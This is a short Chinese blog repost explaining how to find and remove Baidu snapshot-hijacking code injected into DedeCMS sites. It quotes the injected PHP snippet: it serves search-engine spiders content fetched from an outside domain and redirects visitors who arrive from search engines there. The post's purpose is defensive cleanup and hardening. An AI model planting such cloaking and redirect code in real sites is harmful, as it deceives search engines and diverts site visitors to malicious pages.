生活随笔
收集整理的這篇文章主要介紹了
织梦dedecms百度快照劫持注入代码防范与清除
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
DedeCMS織夢百度快照劫持注入代碼防范及修正方法,很多站長做站的過程中,都碰過百度快照被劫持等問題,明明已經修復模板文件了,還是沒有更新回正常的快照,以織夢CMS系統(tǒng)為例,
往往根目錄/index.php也被植入惡意代碼,比如如下這種:
| 2 | if(strpos($_SERVER['HTTP_USER_AGENT'],"spider")||strpos($_SERVER["HTTP_USER_AGENT"],"google")>-1){ $str=file_get_contents("http://域名.com/");echo?$str; } $domain=array('baidu','so'); $fromurl=@strtolower($_SERVER['HTTP_REFERER']); |
| 4 | foreach ($domain as $v) {?if?(strpos($fromurl,$v)!==false) |
| 6 | { $target="http://域名.com/index.html"; header("Location:".$target);?exit; }}?> |
|
單這段代碼就直接把搜索引擎蜘蛛搞暈,帶到別的惡意網址去。把其刪掉,如果在index.php里沒找到,但還是存在類似的問題,可以用dw全站搜索下。
特別注意:關于惡意劫持防范,空間,ftp賬號,權限,后臺賬號之類都需要設置下,不能太過簡單。
總結
以上是生活随笔為你收集整理的织梦dedecms百度快照劫持注入代码防范与清除的全部內容,希望文章能夠幫你解決所遇到的問題。
如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。
